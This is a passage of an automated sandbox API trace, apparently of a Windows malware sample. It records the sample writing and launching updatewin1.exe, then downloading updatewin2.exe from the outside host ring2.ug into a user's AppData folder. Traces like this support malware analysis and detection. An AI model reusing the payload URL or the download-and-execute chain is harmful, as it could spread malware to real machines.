lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0074.598] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0074.618] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0074.618] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0074.619] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0074.620] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0074.621] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0074.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0074.622] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0074.622] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0074.623] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0074.623] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0074.658] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0074.658] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0074.663] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0074.663] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0074.664] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0074.664] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0074.664] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0074.665] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0074.665] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0074.666] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0074.666] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0074.666] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0074.708] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0074.709] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0074.709] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0074.710] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0074.710] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0074.711] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0074.711] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0074.711] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0074.712] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0074.712] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0074.713] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0074.715] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0074.715] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0074.715] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0xa00) returned 1 [0074.716] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0xa00, lpOverlapped=0x0) returned 1 [0074.716] CloseHandle (hObject=0x5ec) returned 1 [0074.720] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0074.725] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0074.727] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0078.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cdb20 | out: hHeap=0x630000) returned 1 [0078.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d7b88 | out: hHeap=0x630000) returned 1 [0078.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0df0 | out: hHeap=0x630000) returned 1 [0078.032] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0078.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d6630 [0078.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0078.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32d6630, cbMultiByte=-1, lpWideCharStr=0x32d0db8, cchWideChar=1072 | out: lpWideCharStr="http://ring2.ug/files/penelop/updatewin2.exe") returned 45 [0078.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x333bc58 [0078.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0078.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d6630 | out: hHeap=0x630000) returned 1 [0078.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x32d0db8 [0078.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0078.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://ring2.ug/files/penelop/updatewin2.exe", cchWideChar=-1, lpMultiByteStr=0x9b78ec8, cbMultiByte=2096, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://ring2.ug/files/penelop/updatewin2.exe", lpUsedDefaultChar=0x0) returned 45 [0078.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0078.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0078.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0078.033] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://ring2.ug/files/penelop/updatewin2.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0078.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0078.842] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x9b2d6d0, lpdwBufferLength=0x9b2d710, lpdwIndex=0x0 | out: lpBuffer=0x9b2d6d0*, lpdwBufferLength=0x9b2d710*=0x4, lpdwIndex=0x0) returned 1 [0078.842] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333f9f0 [0078.842] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fa00 [0078.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333f9f0 | out: hHeap=0x630000) returned 1 [0078.842] lstrcpyA (in: lpString1=0x32cfd68, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4" [0078.842] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4", pMore="updatewin2.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin2.exe") returned 1 [0078.842] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0078.842] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin2.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6b8 [0078.843] SetFilePointer (in: hFile=0x6b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.843] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0078.845] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0078.847] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0078.965] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0078.965] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0078.966] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0078.966] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0078.967] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0078.967] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.119] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.119] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.120] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.120] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.120] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.121] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.121] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.121] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.122] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.122] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.159] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.160] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.160] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.161] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.161] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.161] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.162] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.162] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.163] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.163] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.164] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.164] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.164] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.165] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.198] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.198] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.199] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.200] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.200] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.201] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.201] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.201] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, 